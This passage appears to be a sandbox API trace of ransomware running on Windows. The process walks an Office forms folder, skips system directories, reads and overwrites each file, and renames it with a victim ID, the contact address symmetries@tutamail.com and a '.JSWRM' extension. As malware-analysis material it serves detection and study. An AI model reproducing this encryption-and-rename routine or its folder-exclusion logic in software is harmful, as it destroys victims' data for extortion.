lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESN.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDRESN.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdresn.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.234] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=835) returned 1 [0130.234] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.234] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x340, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x340, lpOverlapped=0x0) returned 1 [0130.235] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.236] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x340, lpOverlapped=0x0) returned 1 [0130.236] CloseHandle (hObject=0x314) returned 1 [0130.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdresn.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDRESN.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdresn.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.237] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x341, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCHDRESP.CFG", cAlternateFileName="")) returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2=".") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="..") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="...") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="windows") returned -1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="recovery") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="perflogs") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="documents and settings") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="system volume information") returned -1 [0130.237] lstrcmpiW (lpString1="SCHDRESP.CFG", lpString2="msocache") returned 1 [0130.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESP.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESP.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDRESP.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESP.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESP.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDRESP.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdresp.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.238] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=833) returned 1 [0130.238] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.238] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x340, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x340, lpOverlapped=0x0) returned 1 [0130.239] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.239] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x340, lpOverlapped=0x0) returned 1 [0130.240] CloseHandle (hObject=0x314) returned 1 [0130.240] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdresp.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDRESP.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdresp.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.241] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCHDREST.CFG", cAlternateFileName="")) returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2=".") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="..") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="...") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="windows") returned -1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="recovery") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="perflogs") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="documents and settings") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="system volume information") returned -1 [0130.241] lstrcmpiW (lpString1="SCHDREST.CFG", lpString2="msocache") returned 1 [0130.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREST.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREST.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDREST.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREST.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREST.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDREST.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdrest.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.242] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=840) returned 1 [0130.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.242] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x340, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x340, lpOverlapped=0x0) returned 1 [0130.243] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.243] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x340, lpOverlapped=0x0) returned 1 [0130.243] CloseHandle (hObject=0x314) returned 1 [0130.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdrest.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDREST.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdrest.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.245] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SECREC.CFG", cAlternateFileName="")) returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2=".") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="..") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="...") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="windows") returned -1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="recovery") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="perflogs") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="documents and settings") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="system volume information") returned -1 [0130.245] lstrcmpiW (lpString1="SECREC.CFG", lpString2="msocache") returned 1 [0130.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECREC.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECREC.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECREC.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECREC.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECREC.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECREC.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.246] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=664) returned 1 [0130.246] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.246] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x290, lpOverlapped=0x0) returned 1 [0130.247] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.247] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x290, lpOverlapped=0x0) returned 1 [0130.247] CloseHandle (hObject=0x314) returned 1 [0130.247] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrec.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECREC.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrec.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.249] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SECRECL.ICO", cAlternateFileName="")) returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2=".") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="..") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="...") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="windows") returned -1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="recovery") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="perflogs") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="documents and settings") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="system volume information") returned -1 [0130.249] lstrcmpiW (lpString1="SECRECL.ICO", lpString2="msocache") returned 1 [0130.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECL.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECRECL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECL.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECRECL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrecl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.250] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.250] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.250] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.322] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.322] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.322] CloseHandle (hObject=0x314) returned 1 [0130.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrecl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECRECL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrecl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.324] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SECRECS.ICO", cAlternateFileName="")) returned 1 [0130.324] lstrcmpiW (lpString1="SECRECS.ICO", lpString2=".") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="..") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="...") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="windows") returned -1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="recovery") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="perflogs") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="documents and settings") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="system volume information") returned -1 [0130.325] lstrcmpiW (lpString1="SECRECS.ICO", lpString2="msocache") returned 1 [0130.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECS.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECRECS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECRECS.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECRECS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrecs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.326] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.326] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.326] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, 